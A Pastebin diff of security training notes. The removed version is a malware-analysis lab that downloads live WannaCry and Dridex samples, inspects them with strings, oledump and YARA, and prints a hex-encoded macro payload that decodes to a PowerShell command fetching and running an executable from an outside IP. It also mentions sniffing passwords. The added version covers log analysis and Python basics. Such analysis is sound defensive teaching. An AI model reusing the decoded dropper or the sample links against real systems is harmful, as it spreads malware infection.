View difference between Paste ID: <a href="/WEDwpcz9">WEDwpcz9</a> and <a href="/QXURDzmA">QXURDzmA</a> - Pastebin.com

View difference between Paste ID: WEDwpcz9 and QXURDzmA

SHOW: | | - or go back to the newest paste.

1		##################################
2	-	# Download the Analysis VM #
2	+	# Pentester Academy Log Analysis #
3		##################################
4	-	https://s3.amazonaws.com/infosecaddictsvirtualmachines/InfoSecAddictsVM.zip
4	+
5	-	user: infosecaddicts
5	+	I'm doing this set of videos for my good friend Vivek Ramachandran at SecurityTube.net/PentesterAcademy.com
6	-	pass: infosecaddicts
6	+
7
8
9
10
11	-	- Log in to your Ubuntu system with the username 'malware' and the password 'malware'.
11	+	##########
12		# VMWare #
13	-	- After logging please open a terminal window and type the following commands:
13	+	##########
14	-	---------------------------Type This-----------------------------------
14	+	- For this workshop you'll need the latest version of VMWare Workstation (Windows), Fusion (Mac), or Player.
15	-	cd Desktop/
15	+
16	-	-----------------------------------------------------------------------
16	+	- Although you can get the VM to run in VirtualBox, I will not be supporting this configuration for this class.
17
18	-	- This is actual Malware (remmeber to run it in a VM - the password to extract it is 'infected':
18	+	VM for these labs
19		-----------------
20	-	---------------------------Type This-----------------------------------
20	+	https://s3.amazonaws.com/infosecaddictsvirtualmachines/Win7x64.zip
21	-	cd ~/Desktop/
21	+	username: workshop
22	-	wget https://s3.amazonaws.com/infosecaddictsfiles/malware-password-is-infected.zip --no-check-certificate
22	+	password: password
23	-	wget https://s3.amazonaws.com/infosecaddictsfiles/analyse_malware.py --no-check-certificate
23	+
24
25	-	unzip malware-password-is-infected.zip
25	+
26	-	infected
26	+
27		##############################################
28	-	file malware.exe
28	+	# Log Analysis with Linux command-line tools #
29		##############################################
30	-	mv malware.exe malware.pdf
30	+	The following command line executables are found in the Mac as well as most Linux Distributions.
31
32	-	file malware.pdf
32	+	cat – prints the content of a file in the terminal window
33		grep – searches and filters based on patterns
34	-	mv malware.pdf malware.exe
34	+	awk – can sort each row into fields and display only what is needed
35		sed – performs find and replace functions
36	-	hexdump -n 2 -C malware.exe
36	+	sort – arranges output in an order
37	-	-----------------------------------------------------------------------
37	+	uniq – compares adjacent lines and can report, filter or provide a count of duplicates
38
39
40	-	*What is '4d 5a' or 'MZ'*
40	+
41	-	Reference:
41	+	###############
42	-	http://www.garykessler.net/library/file_sigs.html
42	+	# Apache Logs #
43		###############
44	-	---------------------------Type This-----------------------------------
44	+
45	-	objdump -x malware.exe
45	+
46		http://www.the-art-of-web.com/system/logs/
47	-	strings malware.exe
47	+
48		wget https://s3.amazonaws.com/SecureNinja/Python/access_log
49	-	strings --all malware.exe \| head -n 6
49	+
50
51	-	strings malware.exe \| grep -i dll
51	+	You want to list all user agents ordered by the number of times they appear (descending order):
52
53	-	strings malware.exe \| grep -i library
53	+	awk -F\" '{print $6}' access_log \| sort \| uniq -c \| sort -fr
54
55	-	strings malware.exe \| grep -i reg
55	+
56
57	-	strings malware.exe \| grep -i hkey
57	+	Using the default separator which is any white-space (spaces or tabs) we get the following:
58
59	-	strings malware.exe \| grep -i hku
59	+	awk '{print $1}' access_log # ip address (%h)
60	-	-----------------------------------------------------------------------
60	+	awk '{print $2}' access_log # RFC 1413 identity (%l)
61	-	- We didn't see anything like HKLM, HKCU or other registry type stuff
61	+	awk '{print $3}' access_log # userid (%u)
62		awk '{print $4,5}' access_log # date/time (%t)
63		awk '{print $9}' access_log # status code (%>s)
64	-	---------------------------Type This-----------------------------------
64	+	awk '{print $10}' access_log # size (%b)
65	-	strings malware.exe \| grep -i irc
65	+
66		You might notice that we've missed out some items. To get to them we need to set the delimiter to the " character which changes the way the lines are 'exploded' and allows the following:
67	-	strings malware.exe \| grep -i join
67	+
68		awk -F\" '{print $2}' access_log # request line (%r)
69	-	strings malware.exe \| grep -i admin
69	+	awk -F\" '{print $4}' access_log # referer
70		awk -F\" '{print $6}' access_log # user agent
71	-	strings malware.exe \| grep -i list
71	+
72	-	-----------------------------------------------------------------------
72	+
73		awk -F\" '{print $6}' access_log \
74	-	- List of IRC commands: https://en.wikipedia.org/wiki/List_of_Internet_Relay_Chat_commands
74	+	\| sed 's/(\([^;]\+; [^;]\+\)[^)]*)/(\1)/' \
75		\| sort \| uniq -c \| sort -fr
76	-	---------------------------Type This-----------------------------------
76	+
77	-	sudo apt-get install -y python-pefile
77	+
78	-	malware
78	+	The next step is to start filtering the output so you can narrow down on a certain page or referer. Would you like to know which pages Google has been requesting from your site?
79
80	-	vi analyse_malware.py
80	+	awk -F\" '($6 ~ /Googlebot/){print $2}' access_log \| awk '{print $2}'
81		Or who's been looking at your guestbook?
82	-	python analyse_malware.py malware.exe
82	+
83	-	-----------------------------------------------------------------------
83	+	awk -F\" '($2 ~ /guestbook\.html/){print $6}' access_log
84
85
86		Reference:
87		https://blog.nexcess.net/2011/01/21/one-liners-for-apache-log-files/
88
89	-	# Good references for WannaCry #
89	+	# top 20 URLs from the last 5000 hits
90		tail -5000 ./access_log \| awk '{print $7}' \| sort \| uniq -c \| sort -rn \| head -20
91		tail -5000 ./access_log \| awk '{freq[$7]++} END {for (x in freq) {print freq[x], x}}' \| sort -rn \| head -20
92	-	References:
92	+
93		# top 20 URLS excluding POST data from the last 5000 hits
94	-	https://gist.github.com/rain-1/989428fa5504f378b993ee6efbc0b168
94	+	tail -5000 ./access_log \| awk -F"[ ?]" '{print $7}' \| sort \| uniq -c \| sort -rn \| head -20
95	-	https://securingtomorrow.mcafee.com/executive-perspectives/analysis-wannacry-ransomware-outbreak/
95	+	tail -5000 ./access_log \| awk -F"[ ?]" '{freq[$7]++} END {for (x in freq) {print freq[x], x}}' \| sort -rn \| head -20
96	-	https://joesecurity.org/reports/report-db349b97c37d22f5ea1d1841e3c89eb4.html
96	+
97		# top 20 IPs from the last 5000 hits
98		tail -5000 ./access_log \| awk '{print $1}' \| sort \| uniq -c \| sort -rn \| head -20
99		tail -5000 ./access_log \| awk '{freq[$1]++} END {for (x in freq) {print freq[x], x}}' \| sort -rn \| head -20
100	-	- After logging please open a terminal window and type the following commands:
100	+
101	-	---------------------------Type This-----------------------------------
101	+	# top 20 URLs requested from a certain ip from the last 5000 hits
102	-	cd Desktop/
102	+	IP=1.2.3.4; tail -5000 ./access_log \| grep $IP \| awk '{print $7}' \| sort \| uniq -c \| sort -rn \| head -20
103		IP=1.2.3.4; tail -5000 ./access_log \| awk -v ip=$IP ' $1 ~ ip {freq[$7]++} END {for (x in freq) {print freq[x], x}}' \| sort -rn \| head -20
104	-	wget https://s3.amazonaws.com/infosecaddictsfiles/wannacry.zip
104	+
105		# top 20 URLS requested from a certain ip excluding, excluding POST data, from the last 5000 hits
106	-	unzip wannacry.zip
106	+	IP=1.2.3.4; tail -5000 ./access_log \| fgrep $IP \| awk -F "[ ?]" '{print $7}' \| sort \| uniq -c \| sort -rn \| head -20
107	-	infected
107	+	IP=1.2.3.4; tail -5000 ./access_log \| awk -F"[ ?]" -v ip=$IP ' $1 ~ ip {freq[$7]++} END {for (x in freq) {print freq[x], x}}' \| sort -rn \| head -20
108
109	-	file wannacry.exe
109	+	# top 20 referrers from the last 5000 hits
110		tail -5000 ./access_log \| awk '{print $11}' \| tr -d '"' \| sort \| uniq -c \| sort -rn \| head -20
111	-	mv wannacry.exe malware.pdf
111	+	tail -5000 ./access_log \| awk '{freq[$11]++} END {for (x in freq) {print freq[x], x}}' \| tr -d '"' \| sort -rn \| head -20
112
113	-	file malware.pdf
113	+	# top 20 user agents from the last 5000 hits
114		tail -5000 ./access_log \| cut -d\ -f12- \| sort \| uniq -c \| sort -rn \| head -20
115	-	mv malware.pdf wannacry.exe
115	+
116		# sum of data (in MB) transferred in the last 5000 hits
117	-	hexdump -n 2 -C wannacry.exe
117	+	tail -5000 ./access_log \| awk '{sum+=$10} END {print sum/1048576}'
118	-	-----------------------------------------------------------------------
118	+
119
120		##############
121		# Cisco Logs #
122	-	*What is '4d 5a' or 'MZ'*
122	+
123
124	-	http://www.garykessler.net/library/file_sigs.html
124	+	wget https://s3.amazonaws.com/StrategicSec-Files/LogAnalysis/cisco.log
125
126
127		AWK Basics
128		----------
129	-	---------------------------Type This-----------------------------------
129	+	To quickly demonstrate the print feature in awk, we can instruct it to show only the 5th word of each line. Here we will print $5. Only the last 4 lines are being shown for brevity.
130	-	objdump -x wannacry.exe
130	+
131		cat cisco.log \| awk '{print $5}' \| tail -n 4
132	-	strings wannacry.exe
132	+
133
134	-	strings --all wannacry.exe \| head -n 6
134	+
135
136	-	strings wannacry.exe \| grep -i dll
136	+	Looking at a large file would still produce a large amount of output. A more useful thing to do might be to output every entry found in “$5”, group them together, count them, then sort them from the greatest to least number of occurrences. This can be done by piping the output through “sort“, using “uniq -c” to count the like entries, then using “sort -rn” to sort it in reverse order.
137
138	-	strings wannacry.exe \| grep -i library
138	+	cat cisco.log \| awk '{print $5}'\| sort \| uniq -c \| sort -rn
139
140	-	strings wannacry.exe \| grep -i reg
140	+
141
142	-	strings wannacry.exe \| grep -i key
142	+
143		While that’s sort of cool, it is obvious that we have some garbage in our output. Evidently we have a few lines that aren’t conforming to the output we expect to see in $5. We can insert grep to filter the file prior to feeding it to awk. This insures that we are at least looking at lines of text that contain “facility-level-mnemonic”.
144	-	strings wannacry.exe \| grep -i rsa
144	+
145		cat cisco.log \| grep %[a-zA-Z]-[0-9]-[a-zA-Z] \| awk '{print $5}' \| sort \| uniq -c \| sort -rn
146	-	strings wannacry.exe \| grep -i open
146	+
147
148	-	strings wannacry.exe \| grep -i get
148	+
149
150	-	strings wannacry.exe \| grep -i mutex
150	+
151		Now that the output is cleaned up a bit, it is a good time to investigate some of the entries that appear most often. One way to see all occurrences is to use grep.
152	-	strings wannacry.exe \| grep -i irc
152	+
153		cat cisco.log \| grep %LINEPROTO-5-UPDOWN:
154	-	strings wannacry.exe \| grep -i join
154	+
155		cat cisco.log \| grep %LINEPROTO-5-UPDOWN:\| awk '{print $10}' \| sort \| uniq -c \| sort -rn
156	-	strings wannacry.exe \| grep -i admin
156	+
157		cat cisco.log \| grep %LINEPROTO-5-UPDOWN:\| sed 's/,//g' \| awk '{print $10}' \| sort \| uniq -c \| sort -rn
158	-	strings wannacry.exe \| grep -i list
158	+
159	-	-----------------------------------------------------------------------
159	+	cat cisco.log \| grep %LINEPROTO-5-UPDOWN:\| sed 's/,//g' \| awk '{print $10 " changed to " $14}' \| sort \| uniq -c \| sort -rn
160
161
162
163
164		#################################
165		# Using Python for log analysis #
166		#################################
167
168
169
170	-	Hmmmmm.......what's the latest thing in the news - oh yeah "WannaCry"
170	+
171		###########################################
172	-	Quick Google search for "wannacry ransomeware analysis"
172	+	# Python Basics Lesson 1: Simple Printing #
173		###########################################
174
175	-	Reference
175	+	>>> print 1
176	-	https://securingtomorrow.mcafee.com/executive-perspectives/analysis-wannacry-ransomware-outbreak/
176	+
177		>>> print hello
178	-	- Yara Rule -
178	+
179		>>> print "hello"
180
181	-	Strings:
181	+	>>> print "Today we are learning Python."
182	-	$s1 = “Ooops, your files have been encrypted!” wide ascii nocase
182	+
183	-	$s2 = “Wanna Decryptor” wide ascii nocase
183	+
184	-	$s3 = “.wcry” wide ascii nocase
184	+
185	-	$s4 = “WANNACRY” wide ascii nocase
185	+	###################################################
186	-	$s5 = “WANACRY!” wide ascii nocase
186	+	# Python Basics Lesson 2: Simple Numbers and Math #
187	-	$s7 = “icacls . /grant Everyone:F /T /C /Q” wide ascii nocase
187	+	###################################################
188
189		>>> 2+2
190
191		>>> 6-3
192
193		>>> 18/7
194
195		>>> 18.0/7
196	-	Ok, let's look for the individual strings
196	+
197		>>> 18.0/7.0
198
199	-	---------------------------Type This-----------------------------------
199	+	>>> 18/7
200	-	strings wannacry.exe \| grep -i ooops
200	+
201		>>> 9%4
202	-	strings wannacry.exe \| grep -i wanna
202	+
203		>>> 8%4
204	-	strings wannacry.exe \| grep -i wcry
204	+
205		>>> 8.75%.5
206	-	strings wannacry.exe \| grep -i wannacry
206	+
207		>>> 6.*7
208	-	strings wannacry.exe \| grep -i wanacry **** Matches $s5, hmmm.....
208	+
209	-	-----------------------------------------------------------------------
209	+	>>> 666
210
211		>>> 6**3
212
213		>>> 5**12
214
215		>>> -5**4
216	-	####################################
216	+
217	-	# Tired of GREP - let's try Python #
217	+
218	-	####################################
218	+
219	-	Decided to make my own script for this kind of stuff in the future. I
219	+
220
221	-	Reference1:
221	+
222	-	https://s3.amazonaws.com/infosecaddictsfiles/analyse_malware.py
222	+	#####################################
223		# Python Basics Lesson 3: Variables #
224	-	This is a really good script for the basics of static analysis
224	+	#####################################
225
226		>>> x=18
227	-	https://joesecurity.org/reports/report-db349b97c37d22f5ea1d1841e3c89eb4.html
227	+
228		>>> x+15
229
230	-	This is really good for showing some good signatures to add to the Python script
230	+	>>> x**3
231
232		>>> y=54
233	-	Here is my own script using the signatures (started this yesterday, but still needs work):
233	+
234	-	https://pastebin.com/guxzCBmP
234	+	>>> x+y
235
236		>>> age=input("Enter number here: ")
237		43
238	-	---------------------------Type This-----------------------------------
238	+
239	-	sudo apt install -y python-pefile
239	+	>>> age+32
240	-	infosecaddicts
240	+
241		>>> age**3
242
243		>>> fname = raw_input("Enter your first name: ")
244	-	wget https://pastebin.com/raw/guxzCBmP
244	+
245		>>> lname = raw_input("Enter your first name: ")
246
247	-	mv guxzCBmP am.py
247	+	>>> fname = raw_input("Enter your name: ")
248		Enter your name: Joe
249
250	-	vi am.py
250	+	>>> lname = raw_input("Enter your name: ")
251		Enter your name: McCray
252	-	python am.py wannacry.exe
252	+
253	-	-----------------------------------------------------------------------
253	+	>>> print fname
254		Joe
255
256		>>> print lname
257		McCray
258
259		>>> print fname lname
260
261	-	Building a Malware Scanner
261	+	>>> print fname+lname
262	-	--------------------------
262	+	JoeMcCray
263
264	-	---------------------------Type This-----------------------------------
264	+
265	-	mkdir ~/Desktop/malwarescanner
265	+
266		NOTE:
267	-	cd ~/Desktop/malwarescanner
267	+	Use "input() for integers and expressions, and use raw_input() when you are dealing with strings.
268
269	-	wget https://github.com/jonahbaron/malwarescanner/archive/master.zip
269	+
270
271	-	unzip master.zip
271	+
272
273	-	cd malwarescanner-master/
273	+	#################################################
274		# Python Basics Lesson 4: Modules and Functions #
275	-	python scanner.py -h
275	+	#################################################
276
277	-	cat strings.txt
277	+	>>> 5**4
278
279	-	cat hashes.txt
279	+	>>> pow(5,4)
280
281	-	mkdir ~/Desktop/malcode
281	+	>>> abs(-18)
282
283	-	cp ~/Desktop/malware.exe ~/Desktop/malcode
283	+	>>> abs(5)
284
285	-	python scanner.py -H hashes.txt -D ~/Desktop/malcode/ strings.txt
285	+	>>> floor(18.7)
286
287	-	cd ~/Desktop/
287	+	>>> import math
288	-	-----------------------------------------------------------------------
288	+
289		>>> math.floor(18.7)
290
291	-	#####################################################
291	+	>>> math.sqrt(81)
292	-	# Analyzing Macro Embedded Malware #
292	+
293	-	# Reference: #
293	+	>>> joe = math.sqrt
294	-	# https://jon.glass/analyzes-dridex-malware-p1/ #
294	+
295	-	#####################################################
295	+	>>> joe(9)
296	-	---------------------------Type This-----------------------------------
296	+
297	-	cd ~/Desktop/
297	+	>>> joe=math.floor
298
299		>>> joe(19.8)
300	-	sudo pip install olefile
300	+
301	-
301	+
302
303	-	mkdir ~/Desktop/oledump
303	+
304
305	-	cd ~/Desktop/oledump
305	+
306
307	-	wget http://didierstevens.com/files/software/oledump_V0_0_22.zip
307	+
308
309	-	unzip oledump_V0_0_22.zip
309	+	###################################
310		# Python Basics Lesson 5: Strings #
311	-	wget https://s3.amazonaws.com/infosecaddictsfiles/064016.zip
311	+	###################################
312
313	-	unzip 064016.zip
313	+	>>> "XSS"
314	-	infected
314	+
315		>>> 'SQLi'
316	-	python oledump.py 064016.doc
316	+
317		>>> "Joe's a python lover"
318	-	python oledump.py 064016.doc -s A4 -v
318	+
319	-	-----------------------------------------------------------------------
319	+	>>> 'Joe\'s a python lover'
320
321		>>> "Joe said \"InfoSec is fun\" to me"
322
323	-	- From this we can see this Word doc contains an embedded file called editdata.mso which contains seven data streams.
323	+	>>> a = "Joe"
324	-	- Three of the data streams are flagged as macros: A3:’VBA/Module1′, A4:’VBA/Module2′, A5:’VBA/ThisDocument’.
324	+
325		>>> b = "McCray"
326	-	---------------------------Type This-----------------------------------
326	+
327	-	python oledump.py 064016.doc -s A5 -v
327	+	>>> a, b
328	-	-----------------------------------------------------------------------
328	+
329		>>> a+b
330	-	- As far as I can tell, VBA/Module2 does absolutely nothing. These are nonsensical functions designed to confuse heuristic scanners.
330	+
331
332	-	---------------------------Type This-----------------------------------
332	+
333	-	python oledump.py 064016.doc -s A3 -v
333	+
334
335	-	- Look for "GVhkjbjv" and you should see:
335	+
336
337	-	636D64202F4B20706F7765727368656C6C2E657865202D457865637574696F6E506F6C69637920627970617373202D6E6F70726F66696C6520284E65772D4F626A6563742053797374656D2E4E65742E576562436C69656E74292E446F776E6C6F616446696C652827687474703A2F2F36322E37362E34312E31352F6173616C742F617373612E657865272C272554454D50255C4A494F696F646668696F49482E63616227293B20657870616E64202554454D50255C4A494F696F646668696F49482E636162202554454D50255C4A494F696F646668696F49482E6578653B207374617274202554454D50255C4A494F696F646668696F49482E6578653B
337	+
338		########################################
339	-	- Take that long blob that starts with 636D and finishes with 653B and paste it in:
339	+	# Python Basics Lesson 6: More Strings #
340	-	http://www.rapidtables.com/convert/number/hex-to-ascii.htm
340	+	########################################
341
342		>>> num = 10
343
344		>>> num + 2
345
346	-	# Yara Ninja #
346	+	>>> "The number of open ports found on this system is " + num
347
348	-	---------------------------Type This-----------------------------------
348	+	>>> num = str(18)
349	-	sudo apt-get remove -y yara
349	+
350		>>> "There are " + num + " vulnerabilities found in this environment."
351
352	-	wget https://github.com/plusvic/yara/archive/v3.4.0.zip
352	+	>>> num2 = 46
353
354	-	sudo apt-get -y install libtool
354	+	>>> "As of 08/20/2012, the number of states that enacted the Security Breach Notification Law is " + `num2`
355
356
357	-	unzip v3.4.0.zip
357	+
358		NOTE:
359	-	cd yara-3.4.0
359	+	Use "input() for integers and expressions, and use raw_input() when you are dealing with strings.
360
361	-	./bootstrap.sh
361	+
362
363	-	./configure
363	+
364
365	-	make
365	+
366
367	-	sudo make install
367	+	###############################################
368		# Python Basics Lesson 7: Sequences and Lists #
369		###############################################
370	-	yara -v
370	+
371		>>> attacks = ['Stack Overflow', 'Heap Overflow', 'Integer Overflow', 'SQL Injection', 'Cross-Site Scripting', 'Remote File Include']
372	-	cd ..
372	+
373		>>> attacks
374	-	wget https://github.com/Yara-Rules/rules/archive/master.zip
374	+	['Stack Overflow', 'Heap Overflow', 'Integer Overflow', 'SQL Injection', 'Cross-Site Scripting', 'Remote File Include']
375
376	-	unzip master.zip
376	+	>>> attacks[3]
377		'SQL Injection'
378	-	cd ~/Desktop
378	+
379		>>> attacks[-2]
380	-	yara rules-master/packer.yar malcode/malware.exe
380	+	'Cross-Site Scripting'
381	-	-----------------------------------------------------------------------
381	+
382
383	-	Places to get more Yara rules:
383	+
384	-	------------------------------
384	+
385	-	https://malwareconfig.com/static/yaraRules/
385	+
386	-	https://github.com/kevthehermit/YaraRules
386	+
387	-	https://github.com/VectraThreatLab/reyara
387	+	########################################
388		# Python Basics Level 8: If Statement #
389		########################################
390		>>> attack="SQLI"
391	-	Yara rule sorting script:
391	+	>>> if attack=="SQLI":
392	-	-------------------------
392	+	print 'The attacker is using SQLI'
393	-	https://github.com/mkayoh/yarasorter
393	+
394		>>> attack="XSS"
395		>>> if attack=="SQLI":
396	-	---------------------------Type This-----------------------------------
396	+	print 'The attacker is using SQLI'
397	-	cd ~/Desktop/rules-master
397	+
398	-	for i in $( ls *.yar --hide=master.yar ); do echo include \"$i\";done > master.yar
398	+
399	-	cd ~/Desktop/
399	+
400	-	yara rules-master/master.yar malcode/malware.exe
400	+	# Reference Videos To Watch #
401	-	-----------------------------------------------------------------------
401	+
402		Here is your first set of youtube videos that I'd like for you to watch:
403		https://www.youtube.com/playlist?list=PLEA1FEF17E1E5C0DA (watch videos 1-10)
404
405
406
407
408
409		#####################################
410		# Lesson 9: Intro to Log Analysis #
411	-	Here is a 2 million sample malware DB created by Derek Morton that you can use to start your DB with:
411	+	#####################################
412	-	http://derekmorton.name/files/malware_12-14-12.sql.bz2
412	+
413		Login to your StrategicSec Ubuntu machine. You can download the VM from the following link:
414
415	-	Malware Repositories:
415	+	https://s3.amazonaws.com/StrategicSec-VMs/Strategicsec-Ubuntu-VPN-163.zip
416	-	http://malshare.com/index.php
416	+	username: strategicsec
417	-	http://www.malwareblacklist.com/
417	+	password: strategicsec
418	-	http://www.virusign.com/
418	+
419	-	http://virusshare.com/
419	+	Then execute the following commands:
420	-	http://www.tekdefense.com/downloads/malware-samples/
420	+	---------------------------------------------------------------------------------------------------------
421
422
423		wget https://s3.amazonaws.com/SecureNinja/Python/access_log
424
425	-	###############################
425	+
426	-	# Creating a Malware Database #
426	+	cat access_log \| grep 141.101.80.188
427	-	###############################
427	+
428		cat access_log \| grep 141.101.80.187
429	-	Creating a malware database (sqlite)
429	+
430	-	---------------------------Type This-----------------------------------
430	+	cat access_log \| grep 108.162.216.204
431	-	sudo apt-get install -y python-simplejson python-simplejson-dbg
431	+
432		cat access_log \| grep 173.245.53.160
433
434	-	wget https://s3.amazonaws.com/infosecaddictsfiles/avsubmit.py
434	+
435	-	wget https://s3.amazonaws.com/infosecaddictsfiles/malware-password-is-infected.zip
435	+
436		Google the following terms:
437	-	unzip malware-password-is-infected.zip
437	+	- Python read file
438	-	infected
438	+	- Python read line
439		- Python read from file
440	-	python avsubmit.py --init
440	+
441
442	-	python avsubmit.py -f malware.exe -e
442	+
443	-	-----------------------------------------------------------------------
443	+
444		########################################################
445		# Lesson 10: Use Python to read in a file line by line #
446		########################################################
447
448	-	Creating a malware database (mysql)
448	+
449		Reference:
450	-	- Step 1: Installing MySQL database
450	+	http://cmdlinetips.com/2011/08/three-ways-to-read-a-text-file-line-by-line-in-python/
451	-	- Run the following command in the terminal:
451	+
452	-	---------------------------Type This-----------------------------------
452	+
453	-	sudo apt-get install mysql-server
453	+
454
455	-
455	+
456	-	- Step 2: Installing Python MySQLdb module
456	+
457	-	- Run the following command in the terminal:
457	+	Let's have some fun.....
458	-	---------------------------Type This-----------------------------------
458	+
459	-	sudo apt-get build-dep python-mysqldb
459	+
460		>>> f = open('access_log', "r")
461
462	-	sudo apt-get install python-mysqldb
462	+	>>> lines = f.readlines()
463
464	-	-----------------------------------------------------------------------
464	+	>>> print lines
465
466	-	Step 3: Logging in
466	+	>>> lines[0]
467	-	Run the following command in the terminal:
467	+
468	-	---------------------------Type This-----------------------------------
468	+	>>> lines[10]
469	-	mysql -u root -p (set a password of 'malware')
469	+
470		>>> lines[50]
471	-	- Then create one database by running following command:
471	+
472	-	---------------------------Type This-----------------------------------
472	+	>>> lines[1000]
473	-	create database malware;
473	+
474		>>> lines[5000]
475	-	exit;
475	+
476		>>> lines[10000]
477	-	wget https://raw.githubusercontent.com/dcmorton/MalwareTools/master/mal_to_db.py
477	+
478		>>> print len(lines)
479	-	vi mal_to_db.py (fill in database connection information)
479	+
480
481	-	python mal_to_db.py -i
481	+
482	-	-----------------------------------------------------------------------
482	+
483
484	-	------- check it to see if the files table was created ------
484	+
485
486	-	mysql -u root -p
486	+
487	-	malware
487	+
488		---------------------------------------------------------
489	-	show databases;
489	+	vi logread1.py
490
491	-	use malware;
491	+
492		## Open the file with read only permit
493	-	show tables;
493	+	f = open('access_log', "r")
494
495	-	describe files;
495	+	## use readlines to read all lines in the file
496		## The variable "lines" is a list containing all lines
497	-	exit;
497	+	lines = f.readlines()
498
499	-	---------------------------------
499	+	print lines
500
501
502	-	- Now add the malicious file to the DB
502	+	## close the file after reading the lines.
503	-	---------------------------Type This-----------------------------------
503	+	f.close()
504	-	python mal_to_db.py -f malware.exe -u
504	+
505	-	-----------------------------------------------------------------------
505	+
506
507
508	-	- Now check to see if it is in the DB
508	+	Google the following:
509	-	---------------------------Type This-----------------------------------
509	+	- python difference between readlines and readline
510	-	mysql -u root -p
510	+	- python readlines and readline
511	-	malware
511	+
512
513	-	mysql> use malware;
513	+
514
515	-	select id,md5,sha1,sha256,time FROM files;
515	+
516		#################################
517	-	mysql> quit;
517	+	# Lesson 11: A quick challenge #
518	-	------------------------------------------------------------------------
518	+	#################################
519
520		Can you write an if/then statement that looks for this IP and print "Found it"?
521
522
523	-	#################
523	+	141.101.81.187
524	-	# PCAP Analysis #
524	+
525	-	#################
525	+
526	-	---------------------------Type This-----------------------------------
526	+
527	-	cd ~/Desktop/
527	+
528
529	-	mkdir suspiciouspcap/
529	+
530		---------------------------------------------------------
531	-	cd suspiciouspcap/
531	+	Hint 1: Use Python to look for a value in a list
532
533	-	wget https://s3.amazonaws.com/infosecaddictsfiles/suspicious-time.pcap
533	+
534		http://www.wellho.net/mouth/1789_Looking-for-a-value-in-a-list-Python.html
535	-	wget https://s3.amazonaws.com/infosecaddictsfiles/chaosreader.pl
535	+
536
537
538	-	perl chaosreader.pl suspicious-time.pcap
538	+
539		---------------------------------------------------------
540	-	firefox index.html
540	+	Hint 2: Use Python to prompt for user input
541
542	-	cat index.text \| grep -v '"' \| grep -oE "([0-9]+\.){3}[0-9]+.*\)"
542	+
543		http://www.cyberciti.biz/faq/python-raw_input-examples/
544	-	cat index.text \| grep -v '"' \| grep -oE "([0-9]+\.){3}[0-9]+.*\)" \| awk '{print $4, $5, $6}' \| sort \| uniq -c \| sort -nr
544	+
545
546
547	-	for i in session_00[0-9]*.http.html; do srcip=`cat "$i" \| grep 'http:\ ' \| awk '{print $2}' \| cut -d ':' -f1`; dstip=`cat "$i" \| grep 'http:\ ' \| awk '{print $4}' \| cut -d ':' -f1`; host=`cat "$i" \| grep 'Host:\ ' \| sort -u \| sed -e 's/Host:\ //g'`; echo "$srcip --> $dstip = $host"; done \| sort -u
547	+
548	-	------------------------------------------------------------------------
548	+
549		Hint 3: Use Python to search for a string in a list
550
551		Reference:
552	-	####################
552	+	http://stackoverflow.com/questions/4843158/check-if-a-python-list-item-contains-a-string-inside-another-string
553	-	# Intro to TCPDump #
553	+
554	-	####################
554	+
555	-	---------------------------Type This-----------------------------------
555	+
556	-	sudo apt-get install tcpdump
556	+
557
558		Here is my solution:
559		-------------------
560	-	Basic sniffing
560	+	$ python
561	-	--------------
561	+	>>> f = open('access_log', "r")
562	-	---------------------------Type This-----------------------------------
562	+	>>> lines = f.readlines()
563	-	sudo tcpdump -n
563	+	>>> ip = '141.101.81.187'
564		>>> for string in lines:
565		... if ip in string:
566	-	Now lets increase the display resolution of this packet, or get more details about it. The verbose switch comes in handy
566	+	... print(string)
567	-	---------------------------Type This-----------------------------------
567	+
568	-	sudo tcpdump -v -n
568	+
569
570
571		Here is one student's solution - can you please explain each line of this code to me?
572	-	Getting the ethernet header (link layer headers)
572	+	-------------------------------------------------------------------------------------
573	-	------------------------------------------------
573	+	#!/usr/bin/python
574	-	In the above examples details of the ethernet header are not printed. Use the -e option to print the ethernet header details as well.
574	+
575	-	---------------------------Type This-----------------------------------
575	+	f = open('access_log')
576	-	sudo tcpdump -vv -n -e
576	+
577	-	------------------------------------------------------------------------
577	+	strUsrinput = raw_input("Enter IP Address: ")
578
579	-	Sniffing a particular interface
579	+	for line in iter(f):
580		ip = line.split(" - ")[0]
581	-	In order to sniff a particular network interface we must specify it with the -i switch. First lets get the list of available interfaces using the -D switch.
581	+	if ip == strUsrinput:
582	-	---------------------------Type This-----------------------------------
582	+	print line
583	-	sudo tcpdump -D
583	+
584	-	------------------------------------------------------------------------
584	+	f.close()
585
586	-	Filtering packets using expressions - Selecting protocols
586	+
587
588	-	---------------------------Type This-----------------------------------
588	+
589	-	$ sudo tcpdump -n tcp
589	+
590	-	------------------------------------------------------------------------
590	+
591		Working with another student after class we came up with another solution:
592	-	Particular host or port
592	+
593	-	-----------------------
593	+	#!/usr/bin/env python
594	-	Expressions can be used to specify source ip, destination ip, and port numbers. The next example picks up all those packets with source address 192.168.1.101
594	+
595	-	---------------------------Type This-----------------------------------
595	+
596	-	$ sudo tcpdump -n 'src 192.168.1.101'
596	+	# This line opens the log file
597	-	------------------------------------------------------------------------
597	+	f=open('access_log',"r")
598
599	-	Next example picks up dns request packets, either those packets which originate from local machine and go to port 53 of some other machine.
599	+	# This line takes each line in the log file and stores it as an element in the list
600	-	---------------------------Type This-----------------------------------
600	+	lines = f.readlines()
601	-	$ sudo tcpdump -n 'udp and dst port 53'
601	+
602	-	------------------------------------------------------------------------
602	+
603		# This lines stores the IP that the user types as a var called userinput
604	-	To display the FTP packets coming from 192.168.1.100 to 192.168.1.2
604	+	userinput = raw_input("Enter the IP you want to search for: ")
605	-	---------------------------Type This-----------------------------------
605	+
606	-	$ sudo tcpdump 'src 192.168.1.100 and dst 192.168.1.2 and port ftp'
606	+
607	-	------------------------------------------------------------------------
607	+
608		# This combination for loop and nested if statement looks for the IP in the list called lines and prints the entire line if found.
609	-	Search the network traffic using grep
609	+	for ip in lines:
610		if ip.find(userinput) != -1:
611	-	Grep can be used along with tcpdump to search the network traffic. Here is a very simple example
611	+	print ip
612	-	---------------------------Type This-----------------------------------
612	+
613	-	$ sudo tcpdump -n -A \| grep -e 'POST'
613	+
614	-	------------------------------------------------------------------------
614	+
615		##################################################
616	-	So what is the idea behind searching packets. Well one good thing can be to sniff passwords.
616	+	# Lesson 12: Look for web attacks in a log file #
617	-	Here is quick example to sniff passwords using egrep
617	+	##################################################
618
619	-	---------------------------Type This-----------------------------------
619	+	In this lab we will be looking at the scan_log.py script and it will scan the server log to find out common hack attempts within your web server log.
